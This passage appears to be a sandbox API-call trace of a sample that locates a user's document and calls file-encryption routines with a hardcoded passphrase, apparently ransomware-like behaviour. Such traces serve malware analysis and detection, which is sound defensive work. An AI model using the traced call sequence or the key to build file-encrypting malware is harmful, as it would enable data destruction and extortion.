dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0077.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0077.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0077.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0077.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0077.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0077.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0077.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0077.135] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0077.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0077.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eafd0 [0077.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0077.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0077.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0077.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0077.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0077.135] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0077.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0077.135] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0077.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0077.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0077.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0077.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0077.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0077.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0077.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0077.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0077.136] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0077.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0077.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0077.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0077.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0077.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0077.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0077.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0077.136] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0077.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9ba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0077.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0077.137] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0077.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0077.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0077.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0077.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0077.137] CloseHandle (hObject=0x258) returned 1 [0077.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0077.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0077.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0077.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0077.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0077.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0077.137] FreeLibrary (hLibModule=0x772d0000) returned 1 [0077.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0077.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0077.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0077.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0077.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0077.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0077.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0077.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0077.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0077.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0077.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0077.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0077.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0077.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0077.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0077.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0077.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0077.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0077.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0077.138] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0077.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0077.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0077.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0077.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0077.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0077.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0077.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0077.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0077.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0077.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0077.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0077.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0077.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0077.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0077.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0077.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0077.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0077.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0077.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0077.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0077.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0077.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0077.139] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0077.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0077.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0077.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0077.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0077.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0077.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0077.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0077.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0077.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0077.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0077.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0077.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0077.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0077.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0077.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0077.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0077.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0077.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0077.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0077.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0077.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0077.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0077.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0077.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0077.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0077.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0077.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.142] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\nDdxnatd.pptx", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39980a90, ftCreationTime.dwHighDateTime=0x1d5d762, ftLastAccessTime.dwLowDateTime=0x4e494740, ftLastAccessTime.dwHighDateTime=0x1d5d0de, ftLastWriteTime.dwLowDateTime=0x4e494740, ftLastWriteTime.dwHighDateTime=0x1d5d0de, nFileSizeHigh=0x0, nFileSizeLow=0x15fcc, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="nDdxnatd.pptx", cAlternateFileName="NDDXNA~1.PPT")) returned 0x41ac540 [0077.142] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0077.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0077.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0077.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0077.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0077.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0077.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.143] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.143] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0077.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.143] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0077.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0077.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0077.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0077.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0077.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0077.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.144] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0077.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0077.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0077.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0077.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.144] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0077.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0077.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.144] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0077.144] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0077.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0077.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0077.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.144] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0077.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0077.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0077.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0077.145] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.145] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0077.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0077.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0077.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797108, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0077.145] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0077.146] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0077.146] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.146] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0077.146] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.146] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.146] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.146] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.146] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0077.146] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0077.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca5e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0077.147] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0077.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0077.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0077.147] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0077.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0077.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0077.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0077.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0077.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0077.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0077.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0077.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0077.147] RtlAllocateHeap (HeapHandle=0x1780000, 